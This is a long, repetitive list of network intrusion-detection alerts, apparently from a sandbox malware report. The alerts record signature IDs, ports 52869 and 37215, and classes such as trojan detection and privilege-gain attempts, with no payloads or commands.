                      SID:2027339
                      Source Port:38190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.820643
                      SID:2025132
                      Source Port:35474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.368020
                      SID:2027339
                      Source Port:45638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.127943
                      SID:2829579
                      Source Port:36788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.332122
                      SID:2027339
                      Source Port:47958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2835222
                      Source Port:53492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.279918
                      SID:2027339
                      Source Port:36802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.333908
                      SID:2025132
                      Source Port:58008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.485640
                      SID:2831300
                      Source Port:34472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.545017
                      SID:2025132
                      Source Port:40230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.282126
                      SID:2027339
                      Source Port:43732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522256
                      SID:2829579
                      Source Port:50446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449834
                      SID:2027339
                      Source Port:44080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.121675
                      SID:2831300
                      Source Port:33358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.767909
                      SID:2025132
                      Source Port:53870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.468265
                      SID:2831300
                      Source Port:59048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.464931
                      SID:2831300
                      Source Port:52162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.223853
                      SID:2027339
                      Source Port:38068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.167111
                      SID:2027339
                      Source Port:53530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.403310
                      SID:2829579
                      Source Port:40392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.055161
                      SID:2025132
                      Source Port:56148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2835222
                      Source Port:53782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2835222
                      Source Port:53550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.285196
                      SID:2027339
                      Source Port:54662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.154674
                      SID:2027339
                      Source Port:51264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.860812
                      SID:2027339
                      Source Port:51696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.457748
                      SID:2027339
                      Source Port:55328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.208694
                      SID:2027339
                      Source Port:34510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.525153
                      SID:2027339
                      Source Port:54732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489725
                      SID:2831300
                      Source Port:47208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.339081
                      SID:2027339
                      Source Port:36148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2829579
                      Source Port:57462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.224112
                      SID:2027339
                      Source Port:59840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2835222
                      Source Port:51310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.568828
                      SID:2025132
                      Source Port:39146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.694959
                      SID:2831300
                      Source Port:46848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2835222
                      Source Port:57776
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.614129
                      SID:2831300
                      Source Port:55124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.234952
                      SID:2027339
                      Source Port:54430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.556241
                      SID:2025132
                      Source Port:60808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2835222
                      Source Port:51382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.939285
                      SID:2025132
                      Source Port:41748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.059855
                      SID:2025132
                      Source Port:43638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.324403
                      SID:2025132
                      Source Port:50108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.954738
                      SID:2027339
                      Source Port:42634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.835674
                      SID:2829579
                      Source Port:47002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.219605
                      SID:2027339
                      Source Port:42298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.191841
                      SID:2027339
                      Source Port:59974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.508651
                      SID:2831300
                      Source Port:42586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.471230
                      SID:2025132
                      Source Port:53956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.817334
                      SID:2027339
                      Source Port:39520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.574335
                      SID:2025132
                      Source Port:51470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.361899
                      SID:2027339
                      Source Port:36406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.127633
                      SID:2027339
                      Source Port:32928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.482733
                      SID:2027339
                      Source Port:48900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2829579
                      Source Port:45740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.509551
                      SID:2027339
                      Source Port:34098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.035057
                      SID:2027339
                      Source Port:41454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.443569
                      SID:2831300
                      Source Port:42064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.480465
                      SID:2025132
                      Source Port:51224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.204856
                      SID:2831300
                      Source Port:54106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.974933
                      SID:2025132
                      Source Port:36530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.790299
                      SID:2025132
                      Source Port:47224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.355569
                      SID:2027339
                      Source Port:56674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471609
                      SID:2027339
                      Source Port:37284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.460726
                      SID:2027339
                      Source Port:56008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.122986
                      SID:2027339
                      Source Port:54170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.376608
                      SID:2829579
                      Source Port:56542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2835222
                      Source Port:57516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:25.723282
                      SID:2831300
                      Source Port:36546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:41.431490
                      SID:2025132
                      Source Port:34348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:25.634766
                      SID:2025132
                      Source Port:37148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:37.871435
                      SID:2027339
                      Source Port:36314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.192985
                      SID:2831300
                      Source Port:39678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2835222
                      Source Port:51586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.250185
                      SID:2027339
                      Source Port:47706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.559359
                      SID:2829579
                      Source Port:46856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.483549
                      SID:2027339
                      Source Port:35608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2835222
                      Source Port:50998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.587244
                      SID:2027339
                      Source Port:48844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.934535
                      SID:2025132
                      Source Port:60162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.171950
                      SID:2027339
                      Source Port:38242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.369794
                      SID:2831300
                      Source Port:49356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.791970
                      SID:2831300
                      Source Port:48090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.447263
                      SID:2831300
                      Source Port:60964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.971446
                      SID:2025132
                      Source Port:57892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.771660
                      SID:2027339
                      Source Port:47338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.678099
                      SID:2027339
                      Source Port:43222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.756250
                      SID:2025132
                      Source Port:59504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.316603
                      SID:2027339
                      Source Port:51362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.613195
                      SID:2027339
                      Source Port:36734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2027339
                      Source Port:36584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.320646
                      SID:2025132
                      Source Port:34822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.447173
                      SID:2829579
                      Source Port:44146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.561552
                      SID:2027339
                      Source Port:59504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2829579
                      Source Port:41166
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:43.392497
                      SID:2027339
                      Source Port:47024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.663981
                      SID:2025132
                      Source Port:36206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.733520
                      SID:2027339
                      Source Port:47944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.320091
                      SID:2027339
                      Source Port:46724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.993302
                      SID:2025132
                      Source Port:39310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.070304
                      SID:2027339
                      Source Port:48160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2829579
                      Source Port:51882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.429987
                      SID:2829579
                      Source Port:54414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.674473
                      SID:2831300
                      Source Port:39664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.447452
                      SID:2027339
                      Source Port:46372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.433951
                      SID:2025132
                      Source Port:50382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.204234
                      SID:2025132
                      Source Port:53358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.803802
                      SID:2025132
                      Source Port:58734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.960840
                      SID:2025132
                      Source Port:58554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:28.049580
                      SID:2025132
                      Source Port:49526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.805275
                      SID:2027339
                      Source Port:42910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.176965
                      SID:2829579
                      Source Port:35526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.465472
                      SID:2027339
                      Source Port:54204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.251823
                      SID:2027339
                      Source Port:54006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.645982
                      SID:2027339
                      Source Port:46170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2829579
                      Source Port:57816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.950361
                      SID:2025132
                      Source Port:35130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.444875
                      SID:2831300
                      Source Port:39334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.391843
                      SID:2025132
                      Source Port:50872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.625456
                      SID:2025132
                      Source Port:60582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.544972
                      SID:2027339
                      Source Port:50580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589392
                      SID:2027339
                      Source Port:52134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.265292
                      SID:2027339
                      Source Port:47238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.442221
                      SID:2027339
                      Source Port:43664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.922584
                      SID:2831300
                      Source Port:43338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.475548
                      SID:2831300
                      Source Port:55604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:34.302136
                      SID:2831300
                      Source Port:46626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.223799
                      SID:2027339
                      Source Port:52360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.880262
                      SID:2027339
                      Source Port:59564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.584864
                      SID:2835222
                      Source Port:35754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2829579
                      Source Port:57638
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.862638
                      SID:2831300
                      Source Port:40720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.430092
                      SID:2027339
                      Source Port:38142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.183242
                      SID:2025132
                      Source Port:36324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:08:18.360344
                      SID:2027339
                      Source Port:52800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.441698
                      SID:2025132
                      Source Port:39742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.584377
                      SID:2027339
                      Source Port:57462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.221858
                      SID:2025132
                      Source Port:42290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2835222
                      Source Port:55460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.106701
                      SID:2025132
                      Source Port:51280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.840145
                      SID:2027339
                      Source Port:53042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.531607
                      SID:2027339
                      Source Port:34616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.727506
                      SID:2027339
                      Source Port:58346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.691705
                      SID:2831300
                      Source Port:51676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.446803
                      SID:2831300
                      Source Port:47970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.467144
                      SID:2027339
                      Source Port:59408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.336567
                      SID:2025132
                      Source Port:53436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.141104
                      SID:2027339
                      Source Port:53910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:45.817352
                      SID:2027339
                      Source Port:53046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.417227
                      SID:2027339
                      Source Port:34788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.537891
                      SID:2027339
                      Source Port:38312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.186864
                      SID:2025132
                      Source Port:32832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.627949
                      SID:2829579
                      Source Port:34958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.018794
                      SID:2831300
                      Source Port:46120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.642815
                      SID:2027339
                      Source Port:47420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.390708
                      SID:2831300
                      Source Port:60752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.622609
                      SID:2829579
                      Source Port:54950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.472912
                      SID:2831300
                      Source Port:48798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.853068
                      SID:2831300
                      Source Port:34060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.320022
                      SID:2027339
                      Source Port:38678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.482595
                      SID:2831300
                      Source Port:59224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.676865
                      SID:2831300
                      Source Port:33062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.718788
                      SID:2027339
                      Source Port:53688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.435630
                      SID:2027339
                      Source Port:43096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.880694
                      SID:2027339
                      Source Port:60172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.171917
                      SID:2025132
                      Source Port:59240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2835222
                      Source Port:38846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.941781
                      SID:2025132
                      Source Port:58728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2025132
                      Source Port:48428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.944258
                      SID:2027339
                      Source Port:54796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.648285
                      SID:2027339
                      Source Port:37916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.476346
                      SID:2025132
                      Source Port:41646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:38.736451
                      SID:2027339
                      Source Port:40670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2829579
                      Source Port:38858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.686584
                      SID:2027339
                      Source Port:45358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.305924
                      SID:2025132
                      Source Port:49210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.831807
                      SID:2829579
                      Source Port:33816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047734
                      SID:2835222
                      Source Port:56826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.348099
                      SID:2831300
                      Source Port:47582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.544144
